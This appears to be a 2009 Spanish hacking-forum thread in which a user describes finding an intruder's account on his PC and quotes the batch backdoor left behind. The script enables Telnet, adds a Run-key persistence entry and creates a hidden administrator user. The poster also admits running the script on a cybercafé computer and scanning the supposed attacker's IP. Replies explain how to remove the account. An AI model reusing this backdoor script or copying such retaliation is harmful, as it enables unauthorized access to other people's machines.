elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 01:07  

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, kamsky, TRICKY)
| | | |-+  ms-dos
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ms-dos  (Leído 2,183 veces)
onerk

Desconectado Desconectado

Ver Perfil
ms-dos
« en: 15 Agosto 2009, 19:54 »

hola mi problema es el siguiente espero y me hayuden ...

El dia de hoy desperte muy tranquilamente.....entonces prendi la pc y que raro? habia un nuevo usuario?  se llamava gorth...quien sabe quien  que es ?? bueno el problema es que fui hackeado.... jumm jumm.. y esa personita ya tiene acceso a mi pc cuando quiera de echo hasta hizo su propio usuario¡¡  nimodos..

aaa pero jaja que risa el dejo un rastrotote dejo un .txt  con lo sig:

@echo off de el bat
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f de el bat
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d ruta de el bat /f de el bat
net user usuario password /add de el bat
net localgroup "Administradores" usuario /add de el bat
tlntadmn config port = 23 de el bat
exit de el bat

mmmm esto me hizo recordar que un disque amigo de la school me emvio un .bat

lo que hice fue guardar el .txt y pasarlo a bat. para instalarlo en un cyber haber que pasa?? y sucedio lo mismo ahora..el problema es el sig no puedo eliminar su usuario¡¡¡  ya lei lo que dejo y la clave es usuario ya entre..pero no puedo eliminarlo solo cambie la contraceña¡¡¡ pero bueno.... ese es mi problema..

y me dejo su numero ip..jaja ya lo tengo...192.168.1.64  le di ping..y perdidos=0

mm...escanie sus puertos y el mas frajil es 2105 pero...al darle telnet desde el ms-dos no se puede¡¡¡ sale el ms-dos en negro y escribo y no se ve nada?? por que??
de antemano gracias

xD UNA DE DOS O LO ROMPES O LO COMPONESxD
Hole_System

Ver Perfil
Re: ms-dos
« Respuesta #1 en: 16 Agosto 2009, 09:07 »

Para borrar un usuario via MS-DOS basta con..

net user usuariox /del

Por aqui hay varios manuales de Ms-Dos busca un poco es relativamente facil..  :xD

Interesante no me conocia esa del servidor Telnet,  ;D siempre se aprende algo, por eso reviso de ves en cuando mensajes como stos...

Espero que sepas que hacen esas lineas del .bat

Usa un cliente TELNET asi te evitas lo de porque no ves nada, la verdad es que no uso mucho el telnet de Windows nada mas que para visualizar BANNERS  :P

Bye suerte

By Pitoniso.
wscalle1

Ver Perfil
« Respuesta #2 en: 16 Agosto 2009, 10:28 »

jajaja esa era mi ip hace una semana

jaja

peib0l
Wiki

el dinero no puede comprar la vida.

Ver Perfil
« Respuesta #3 en: 16 Agosto 2009, 10:38 »

no puedo eliminar su usuario¡¡¡  ya lei lo que dejo y la clave es usuario ya entre..pero no puedo eliminarlo solo cambie la contraceña¡¡¡ pero bueno.... ese es mi problema..

1. para borrar un usuario hay que ahcerlo desde otro usuario diferente

y me dejo su numero ip..jaja ya lo tengo...192.168.1.64  le di ping..y perdidos=0

2. Esa no es su ip aprende algo de redes...

mm...escanie sus puertos y el mas frajil es 2105 pero...al darle telnet desde el ms-dos no se puede¡¡¡ sale el ms-dos en negro y escribo y no se ve nada?? por que??

¬¬

onerk

Ver Perfil
« Respuesta #4 en: 16 Agosto 2009, 23:05 »

jaja okaz ezta bien gracias ya elimine el user =

no puedo eliminar su usuario¡¡¡  ya lei lo que dejo y la clave es usuario ya entre..pero no puedo eliminarlo solo cambie la contraceña¡¡¡ pero bueno.... ese es mi problema..

1. para borrar un usuario hay que ahcerlo desde otro usuario diferente

?¿?¿?¿?¿¿?¿?¿?¿?  obio que lo se pero el problema era que el lo hizo como administrador del equipo para eliminarlo debo de hacer otro y asi concecutivamente por que el mio estaba en administrador pero no se por que?? no vale o no quiere?? ok gracias por tu ayuda hole_system lo elimine via ms-dos....grax xd salu2

xD UNA DE DOS O LO ROMPES O LO COMPONESxD
dantemc

Amakakeru Ryu No Hirameki. en tu cara :P

Ver Perfil
« Respuesta #5 en: 18 Agosto 2009, 03:17 »

si lo haces desde el administrador qeu nunca debes tocar por ejemplo, para ejecutar bats ¬¬, segundo lo de la ip esa es una ip interna, asi que ni es la de él ni es la qeu tenia hace 2 semanas wsacalle1 xD

8-D
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a: